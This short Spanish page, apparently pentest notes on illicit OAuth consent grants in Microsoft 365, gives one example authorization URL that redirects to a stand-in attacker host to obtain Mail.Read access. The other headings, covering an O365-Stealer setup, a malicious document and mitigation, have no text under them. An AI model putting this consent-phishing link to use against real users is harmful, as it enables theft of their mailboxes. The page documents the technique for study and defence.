Concesiones de consentimiento ilegales
Concesiones de consentimiento ilegales
> Flujo de explotación
https://login.microsoftonline.com/common/oauth2/v2.0/authorize?
client_id=attacker-app-id&
response_type=code&
redirect_uri=https://attacker-controlled.com/redirect&
scope=Mail.Read&
prompt=consent> Prueba de concepto
>> Creación de una aplicación

>> Configuración y ejecución de O365-Stealer







>> Creación de un fichero doc malicioso
>> Subida de un fichero doc malicioso a OneDrive
> Mitigación
Última actualización